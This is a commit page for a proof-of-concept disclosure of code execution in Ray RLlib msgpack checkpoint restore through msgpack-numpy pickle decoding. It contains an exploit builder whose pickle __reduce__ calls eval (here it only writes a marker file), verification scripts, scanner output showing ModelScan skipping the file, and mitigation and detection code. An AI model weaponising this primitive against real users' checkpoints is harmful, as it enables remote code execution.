pragnyanramtha committed · Commit 2a3c1ea · verified · 1 Parent(s): acf0cc3

Upload folder using huggingface_hub

README.md ADDED
@@ -0,0 +1,107 @@
+ # Benign MessagePack / RLlib Checkpoint Security PoC
+
+ This repository stages a safe proof-of-concept for a MessagePack-based ML checkpoint loading issue. The artifact is a tiny `state.msgpack` file that follows the Ray RLlib checkpoint state-file shape and carries a NumPy object-dtype array encoded through `msgpack-numpy`.
+
+ When decoded through Ray RLlib's `restore_from_path()` MessagePack path, the `msgpack-numpy` 0.4.8 decoder reaches `pickle.loads()` for object-dtype array data. The embedded payload only writes a local marker file named `MSG_PACK_NUMPY_MARKER.txt`.
+
+ ## Files
+
+ - `state.msgpack` - benign PoC checkpoint state file.
+ - `verify_poc.py` - verifies plain MessagePack parsing, direct `msgpack-numpy` parsing, and Ray RLlib restore behavior.
+ - `build_poc.py` - reproduces the artifact generation.
+ - `artifact_manifest.json` - SHA256, size, and marker details.
+ - `results.json` - local verification output.
+ - `scanner_output_file.json` - ModelScan 0.8.8 output for `state.msgpack`.
+ - `scanner_output_dir.json` - ModelScan 0.8.8 output for this staged folder.
+ - `requirements.txt` - pinned reproduction dependencies used for this validation.
+
+ ## Tested Versions
+
+ - Python 3.12.12
+ - Ray 2.55.1
+ - msgpack 1.1.2
+ - msgpack-numpy 0.4.8
+ - NumPy 2.4.4
+ - ModelScan 0.8.8
+
+ ## Reproduction
+
+ ```bash
+ python -m venv .venv
+ .venv/Scripts/python -m pip install -r requirements.txt
+ .venv/Scripts/python build_poc.py
+ .venv/Scripts/python verify_poc.py
+ .venv/Scripts/modelscan -p state.msgpack -r json -o scanner_output_file.json --show-skipped
+ ```
+
+ On Linux/macOS, replace `.venv/Scripts/` with `.venv/bin/` in the commands above.
+
+ Expected behavior:
+
+ - Plain `msgpack.load()` parses the file as data and does not create the marker.
+ - `msgpack_numpy.load()` creates `MSG_PACK_NUMPY_MARKER.txt`.
+ - Ray RLlib `Checkpointable.restore_from_path()` creates `MSG_PACK_NUMPY_MARKER.txt`.
+ - ModelScan 0.8.8 reports `total_scanned: 0` and skips `state.msgpack` as `SCAN_NOT_SUPPORTED`.
+
+ ## Evidence Summary
+
+ Artifact:
+
+ ```text
+ SHA256: 3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465
+ Size: 506 bytes
+ ```
+
+ Runtime:
+
+ ```json
+ "ray_rllib_restore_check": {
+   "restored_keys": ["format", "object_array", "safe_weights"],
+   "object_array_type": "ndarray",
+   "object_array_repr": "array([34], dtype=object)",
+   "marker_created": true,
+   "marker_text": "msgpack_numpy_object_array_marker\n"
+ }
+ ```
+
+ Scanner:
+
+ ```json
+ "scanned": {"total_scanned": 0},
+ "skipped": {
+   "total_skipped": 1,
+   "skipped_files": [{
+     "category": "SCAN_NOT_SUPPORTED",
+     "description": "Model Scan did not scan file",
+     "source": "state.msgpack"
+   }]
+ }
+ ```
+
+ ## Why This Is ML-Format Relevant
+
+ Ray RLlib documents checkpoints as model/training artifacts that can be saved to local disk or cloud storage and restored through `restore_from_path()` / `from_checkpoint()`. The docs state that checkpoint directories contain a `pickle` or `msgpack` state file, and current RLlib source loads `state.msgpack` with a `msgpack` module patched by `msgpack-numpy`.
+
+ Primary references:
+
+ - Ray RLlib checkpoint docs: https://docs.ray.io/en/latest/rllib/checkpoints.html
+ - Ray RLlib source for `state.msgpack` restore and `try_import_msgpack`: https://docs.ray.io/en/latest/_modules/ray/rllib/utils/checkpoints.html
+ - msgpack-numpy 0.4.8 decoder source: https://github.com/lebedov/msgpack-numpy/blob/0.4.8/msgpack_numpy.py
+ - ModelScan 0.8.8 supported scanner extensions: https://github.com/protectai/modelscan/blob/v0.8.8/modelscan/settings.py
+
+ ## Security Impact
+
+ An attacker-controlled RLlib `.msgpack` checkpoint state file can trigger arbitrary Python execution when a victim restores the checkpoint through RLlib's MessagePack path. This PoC uses a harmless local marker write, but the primitive is Python pickle execution hidden inside a MessagePack/NumPy serialization layer.
+
+ Limitations:
+
+ - This is not a native parser memory-corruption issue.
+ - It requires a victim workflow that restores an untrusted Ray RLlib MessagePack checkpoint or otherwise decodes the artifact through `msgpack-numpy`.
+ - The scanner evidence is a ModelScan unsupported-format gap for a dangerous `.msgpack` artifact, not a claim that every Hugging Face scanner accepts the file as clean.
+
+ ## Mitigations
+
+ - Do not restore untrusted RLlib MessagePack checkpoints.
+ - Reject or sanitize object-dtype arrays during MessagePack checkpoint restore.
+ - Avoid `msgpack_numpy.patch()` for untrusted checkpoint data, or make the object-dtype pickle path opt-in only.
+ - Add scanner support for `.msgpack` model artifacts that recursively detects nested pickle payloads in `msgpack-numpy` object-array records.
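The last mitigation, detecting pickle payloads nested in decoded MessagePack data, could be prototyped roughly as follows. This is a minimal standard-library sketch, not ModelScan's or `msgpack-numpy`'s implementation. `risky_pickle_opcodes`, `find_pickle_blobs`, and `SortedCall` are hypothetical names, the opcode set is an illustrative choice rather than an exhaustive one, and the input is assumed to be the nested dict/list structure that a plain `msgpack` decode (without the `msgpack-numpy` hook) would return.

```python
import pickle
import pickletools
import struct

# Opcodes that import or call objects during unpickling (illustrative, not exhaustive).
RISKY_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def risky_pickle_opcodes(blob: bytes) -> set:
    """Disassemble blob without executing it and collect risky opcode names."""
    found = set()
    try:
        for opcode, _arg, _pos in pickletools.genops(blob):
            if opcode.name in RISKY_OPCODES:
                found.add(opcode.name)
    except Exception:
        # Not a well-formed pickle stream; keep whatever was seen before the error.
        pass
    return found


def find_pickle_blobs(node, path="$"):
    """Recursively yield (path, opcodes) for bytes values that disassemble as risky pickles."""
    if isinstance(node, (bytes, bytearray)):
        ops = risky_pickle_opcodes(bytes(node))
        if ops:
            yield path, sorted(ops)
    elif isinstance(node, dict):
        for key, value in node.items():
            yield from find_pickle_blobs(value, f"{path}[{key!r}]")
    elif isinstance(node, (list, tuple)):
        for index, value in enumerate(node):
            yield from find_pickle_blobs(value, f"{path}[{index}]")


class SortedCall:
    """Harmless stand-in payload: unpickling would call sorted([3, 1, 2])."""

    def __reduce__(self):
        return (sorted, ([3, 1, 2],))


# Hypothetical decoded structure: one raw float32 buffer, one pickled object buffer.
decoded = {
    "safe_weights": {"data": struct.pack("<3f", 1.0, 2.0, 3.0)},
    "object_array": {"data": pickle.dumps(SortedCall(), protocol=2)},
}
findings = list(find_pickle_blobs(decoded))
print(findings)
```

Because `pickletools.genops` only disassembles the stream, the payload is never executed. The check is deliberately conservative: it keeps any risky opcode seen before a parse error, so arbitrary binary data could occasionally be flagged as a false positive.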
artifact_manifest.json ADDED
@@ -0,0 +1,8 @@
+ {
+   "artifact": "state.msgpack",
+   "sha256": "3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465",
+   "size_bytes": 506,
+   "marker_file": "MSG_PACK_NUMPY_MARKER.txt",
+   "marker_text": "msgpack_numpy_object_array_marker",
+   "impact": "Benign marker file is created when a loader decodes the object-dtype array through msgpack-numpy."
+ }
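The manifest's `sha256` and `size_bytes` fields make it possible to confirm that a downloaded `state.msgpack` is the exact artifact described here before running anything against it. A minimal sketch, assuming the manifest and artifact sit in the same directory; `verify_artifact` is a hypothetical helper that is not part of this commit:

```python
import hashlib
import json
from pathlib import Path


def verify_artifact(manifest_path: Path) -> bool:
    """Return True if the artifact next to the manifest matches its recorded size and SHA256."""
    manifest = json.loads(manifest_path.read_text(encoding="utf-8"))
    artifact = manifest_path.parent / manifest["artifact"]
    data = artifact.read_bytes()  # read as bytes only; the file is never decoded
    return (
        len(data) == manifest["size_bytes"]
        and hashlib.sha256(data).hexdigest() == manifest["sha256"]
    )
```

Calling `verify_artifact(Path("artifact_manifest.json"))` from the staged folder should return `True` for an unmodified artifact. If the repository was cloned without Git LFS, `state.msgpack` is only a pointer file and the check is expected to fail.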
build_poc.py ADDED
@@ -0,0 +1,64 @@
+ #!/usr/bin/env python
+ """Build a benign Ray RLlib MessagePack checkpoint PoC artifact."""
+
+ from __future__ import annotations
+
+ import hashlib
+ import json
+ from pathlib import Path
+
+ import msgpack_numpy
+ import numpy as np
+
+
+ ARTIFACT_NAME = "state.msgpack"
+ MARKER_NAME = "MSG_PACK_NUMPY_MARKER.txt"
+ MARKER_TEXT = "msgpack_numpy_object_array_marker\n"
+
+
+ class Marker:
+     def __reduce__(self):
+         # Benign local marker-file proof. No network, persistence, or destructive action.
+         code = (
+             "__import__('pathlib').Path(%r).write_text(%r, encoding='utf-8')"
+             % (MARKER_NAME, MARKER_TEXT)
+         )
+         return (eval, (code,))
+
+
+ def sha256(path: Path) -> str:
+     digest = hashlib.sha256()
+     with path.open("rb") as handle:
+         for chunk in iter(lambda: handle.read(1024 * 1024), b""):
+             digest.update(chunk)
+     return digest.hexdigest()
+
+
+ def main() -> None:
+     out_dir = Path(__file__).resolve().parent
+     artifact = out_dir / ARTIFACT_NAME
+
+     state = {
+         "format": "ray_rllib_state_msgpack",
+         "safe_weights": np.array([1.0, 2.0, 3.0], dtype=np.float32),
+         "object_array": np.array([Marker()], dtype=object),
+     }
+     artifact.write_bytes(msgpack_numpy.packb(state, use_bin_type=True))
+
+     manifest = {
+         "artifact": ARTIFACT_NAME,
+         "sha256": sha256(artifact),
+         "size_bytes": artifact.stat().st_size,
+         "marker_file": MARKER_NAME,
+         "marker_text": MARKER_TEXT.strip(),
+         "impact": "Benign marker file is created when a loader decodes the object-dtype array through msgpack-numpy.",
+     }
+     (out_dir / "artifact_manifest.json").write_text(
+         json.dumps(manifest, indent=2) + "\n",
+         encoding="utf-8",
+     )
+     print(json.dumps(manifest, indent=2))
+
+
+ if __name__ == "__main__":
+     main()
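`Marker.__reduce__` in `build_poc.py` works because `pickle` stores the `(callable, args)` pair returned by `__reduce__` and invokes that callable at load time. The sketch below isolates the same mechanism with a harmless built-in and writes no file; `LoadTimeCall` is a hypothetical class used only for illustration.

```python
import pickle


class LoadTimeCall:
    """Hypothetical demo class: unpickling calls len("marker") instead of rebuilding an instance."""

    def __reduce__(self):
        # pickle records (callable, args) and calls callable(*args) during loads().
        return (len, ("marker",))


blob = pickle.dumps(LoadTimeCall())
restored = pickle.loads(blob)  # runs len("marker"); no LoadTimeCall instance is created
print(type(restored).__name__, restored)
```

The unpickled value is whatever the callable returns, not an instance of the original class. That is consistent with the restored `object_array` holding `34` in the recorded results: `write_text()` returns the number of characters written, and the marker text is 34 characters long.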
requirements.txt ADDED
@@ -0,0 +1,5 @@
+ ray[rllib]==2.55.1
+ msgpack==1.1.2
+ msgpack-numpy==0.4.8
+ numpy==2.4.4
+ modelscan==0.8.8
results.json ADDED
@@ -0,0 +1,44 @@
+ {
+   "artifact": "C:\\Users\\Pragnyan\\dev\\huntr-exp1\\messagepack\\hf_messagepack_poc\\state.msgpack",
+   "artifact_sha256": "3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465",
+   "artifact_size_bytes": 506,
+   "versions": {
+     "python": "3.12.12 (main, Oct 28 2025, 14:15:42) [MSC v.1944 64 bit (AMD64)]",
+     "ray": "2.55.1",
+     "msgpack": "1.1.2",
+     "msgpack-numpy": "0.4.8",
+     "numpy": "2.4.4",
+     "modelscan": "0.8.8"
+   },
+   "plain_msgpack_check": {
+     "plain_msgpack_type": "dict",
+     "plain_msgpack_keys": [
+       "format",
+       "object_array",
+       "safe_weights"
+     ],
+     "marker_created": false
+   },
+   "direct_msgpack_numpy_check": {
+     "msgpack_numpy_type": "dict",
+     "msgpack_numpy_keys": [
+       "format",
+       "object_array",
+       "safe_weights"
+     ],
+     "marker_created": true,
+     "marker_text": "msgpack_numpy_object_array_marker\n"
+   },
+   "ray_rllib_restore_check": {
+     "restored_keys": [
+       "format",
+       "object_array",
+       "safe_weights"
+     ],
+     "object_array_type": "ndarray",
+     "object_array_repr": "array([34], dtype=object)",
+     "marker_created": true,
+     "marker_text": "msgpack_numpy_object_array_marker\n"
+   },
+   "limitation": "This is ACE via msgpack-numpy object-array pickle decoding during RLlib msgpack checkpoint restore; it is not a native parser memory-corruption issue."
+ }
scanner_output_dir.json ADDED
@@ -0,0 +1 @@
+ {"summary": {"total_issues_by_severity": {"LOW": 0, "MEDIUM": 0, "HIGH": 0, "CRITICAL": 0}, "total_issues": 0, "input_path": ".", "absolute_path": "C:\\Users\\Pragnyan\\dev\\huntr-exp1\\messagepack\\hf_messagepack_poc", "modelscan_version": "0.8.8", "timestamp": "2026-05-12T12:55:25.546341", "scanned": {"total_scanned": 0}, "skipped": {"total_skipped": 7, "skipped_files": [{"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "artifact_manifest.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "build_poc.py"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "results.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "scanner_output_dir.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "scanner_output_file.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "state.msgpack"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "verify_poc.py"}]}}, "issues": [], "errors": []}
scanner_output_file.json ADDED
@@ -0,0 +1 @@
+ {"summary": {"total_issues_by_severity": {"LOW": 0, "MEDIUM": 0, "HIGH": 0, "CRITICAL": 0}, "total_issues": 0, "input_path": "state.msgpack", "absolute_path": "C:\\Users\\Pragnyan\\dev\\huntr-exp1\\messagepack\\hf_messagepack_poc", "modelscan_version": "0.8.8", "timestamp": "2026-05-12T12:55:25.524512", "scanned": {"total_scanned": 0}, "skipped": {"total_skipped": 1, "skipped_files": [{"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "state.msgpack"}]}}, "issues": [], "errors": []}
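A report like this one shows zero issues only because nothing was scanned, which is easy to misread as a clean result. The sketch below shows one way a pipeline could tell the two cases apart. It assumes the JSON layout visible in the report above (`summary.scanned` and `summary.skipped`); `unscanned_files` and `is_clean_by_omission` are hypothetical helpers, not part of ModelScan.

```python
import json


def unscanned_files(report: dict) -> list:
    """List sources that the report marks as skipped with SCAN_NOT_SUPPORTED."""
    skipped = report["summary"]["skipped"]["skipped_files"]
    return [entry["source"] for entry in skipped if entry["category"] == "SCAN_NOT_SUPPORTED"]


def is_clean_by_omission(report: dict) -> bool:
    """True when zero issues were reported and no file was actually scanned."""
    summary = report["summary"]
    return summary["total_issues"] == 0 and summary["scanned"]["total_scanned"] == 0


# Trimmed copy of the report above, keeping only the fields used here.
report = json.loads("""
{"summary": {"total_issues": 0,
             "scanned": {"total_scanned": 0},
             "skipped": {"total_skipped": 1, "skipped_files": [
                 {"category": "SCAN_NOT_SUPPORTED",
                  "description": "Model Scan did not scan file",
                  "source": "state.msgpack"}]}},
 "issues": [], "errors": []}
""")
print(unscanned_files(report), is_clean_by_omission(report))
```

A gate built on this idea would treat "clean by omission" as a failure or a manual-review case rather than a pass.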
state.msgpack ADDED
@@ -0,0 +1,3 @@
+ version https://git-lfs.github.com/spec/v1
+ oid sha256:3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465
+ size 506
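The three lines above are a Git LFS pointer, not the binary artifact itself. Its `oid` and `size` should agree with `artifact_manifest.json`. A small sketch of that cross-check, assuming the simple `key value` line layout shown here; `parse_lfs_pointer` is a hypothetical helper:

```python
def parse_lfs_pointer(text: str) -> dict:
    """Parse the 'key value' lines of a Git LFS pointer into a small dict."""
    fields = dict(line.split(" ", 1) for line in text.strip().splitlines())
    algo, _, digest = fields["oid"].partition(":")
    return {
        "version": fields["version"],
        "algo": algo,
        "digest": digest,
        "size": int(fields["size"]),
    }


pointer = parse_lfs_pointer(
    "version https://git-lfs.github.com/spec/v1\n"
    "oid sha256:3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465\n"
    "size 506\n"
)
print(pointer["algo"], pointer["digest"], pointer["size"])
```

Here the parsed digest and size match the `sha256` and `size_bytes` values recorded in the manifest.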
verify_poc.py ADDED
@@ -0,0 +1,141 @@
+ #!/usr/bin/env python
+ """Verify the benign MessagePack/model checkpoint deserialization PoC."""
+
+ from __future__ import annotations
+
+ import argparse
+ import hashlib
+ import importlib.metadata as metadata
+ import json
+ import sys
+ from pathlib import Path
+ from typing import Any, Dict, Optional, Tuple
+
+ import msgpack
+ import msgpack_numpy
+ import numpy as np
+ import ray
+ from ray.rllib.utils.checkpoints import Checkpointable
+
+
+ ARTIFACT_NAME = "state.msgpack"
+ MARKER_NAME = "MSG_PACK_NUMPY_MARKER.txt"
+
+
+ class DemoCheckpointable(Checkpointable):
+     def __init__(self) -> None:
+         self.restored_state: Optional[Dict[str, Any]] = None
+
+     def get_state(self, components=None, *, not_components=None, **kwargs):
+         return {}
+
+     def set_state(self, state):
+         self.restored_state = state
+
+     def get_ctor_args_and_kwargs(self) -> Tuple[Tuple, Dict[str, Any]]:
+         return (), {}
+
+
+ def sha256(path: Path) -> str:
+     digest = hashlib.sha256()
+     with path.open("rb") as handle:
+         for chunk in iter(lambda: handle.read(1024 * 1024), b""):
+             digest.update(chunk)
+     return digest.hexdigest()
+
+
+ def package_version(name: str) -> str:
+     try:
+         return metadata.version(name)
+     except metadata.PackageNotFoundError:
+         return "not installed"
+
+
+ def plain_msgpack_check(artifact: Path, marker: Path) -> Dict[str, Any]:
+     marker.unlink(missing_ok=True)
+     with artifact.open("rb") as handle:
+         data = msgpack.load(handle, raw=False, strict_map_key=False)
+     return {
+         "plain_msgpack_type": type(data).__name__,
+         "plain_msgpack_keys": sorted(str(k) for k in data.keys()),
+         "marker_created": marker.exists(),
+     }
+
+
+ def rllib_restore_check(checkpoint_dir: Path, marker: Path) -> Dict[str, Any]:
+     marker.unlink(missing_ok=True)
+     demo = DemoCheckpointable()
+     demo.restore_from_path(checkpoint_dir)
+     restored = demo.restored_state or {}
+     marker_text = marker.read_text(encoding="utf-8") if marker.exists() else None
+     object_value = restored.get("object_array")
+     return {
+         "restored_keys": sorted(restored.keys()),
+         "object_array_type": type(object_value).__name__,
+         "object_array_repr": repr(object_value),
+         "marker_created": marker.exists(),
+         "marker_text": marker_text,
+     }
+
+
+ def direct_msgpack_numpy_check(artifact: Path, marker: Path) -> Dict[str, Any]:
+     marker.unlink(missing_ok=True)
+     with artifact.open("rb") as handle:
+         data = msgpack_numpy.load(handle, raw=False, strict_map_key=False)
+     marker_text = marker.read_text(encoding="utf-8") if marker.exists() else None
+     return {
+         "msgpack_numpy_type": type(data).__name__,
+         "msgpack_numpy_keys": sorted(data.keys()),
+         "marker_created": marker.exists(),
+         "marker_text": marker_text,
+     }
+
+
+ def main() -> None:
+     parser = argparse.ArgumentParser()
+     parser.add_argument(
+         "--artifact",
+         type=Path,
+         default=Path(__file__).resolve().parent / ARTIFACT_NAME,
+     )
+     parser.add_argument(
+         "--results",
+         type=Path,
+         default=Path(__file__).resolve().parent / "results.json",
+     )
+     args = parser.parse_args()
+
+     artifact = args.artifact.resolve()
+     checkpoint_dir = artifact.parent
+     marker = Path.cwd() / MARKER_NAME
+
+     if not artifact.exists():
+         raise FileNotFoundError(artifact)
+
+     results = {
+         "artifact": str(artifact),
+         "artifact_sha256": sha256(artifact),
+         "artifact_size_bytes": artifact.stat().st_size,
+         "versions": {
+             "python": sys.version,
+             "ray": ray.__version__,
+             "msgpack": package_version("msgpack"),
+             "msgpack-numpy": package_version("msgpack-numpy"),
+             "numpy": np.__version__,
+             "modelscan": package_version("modelscan"),
+         },
+         "plain_msgpack_check": plain_msgpack_check(artifact, marker),
+         "direct_msgpack_numpy_check": direct_msgpack_numpy_check(artifact, marker),
+         "ray_rllib_restore_check": rllib_restore_check(checkpoint_dir, marker),
+         "limitation": "This is ACE via msgpack-numpy object-array pickle decoding during RLlib msgpack checkpoint restore; it is not a native parser memory-corruption issue.",
+     }
+
+     args.results.write_text(json.dumps(results, indent=2, default=str) + "\n", encoding="utf-8")
+     print(json.dumps(results, indent=2, default=str))
+
+     if not results["ray_rllib_restore_check"]["marker_created"]:
+         raise SystemExit("marker was not created through Ray RLlib restore path")
+
+
+ if __name__ == "__main__":
+     main()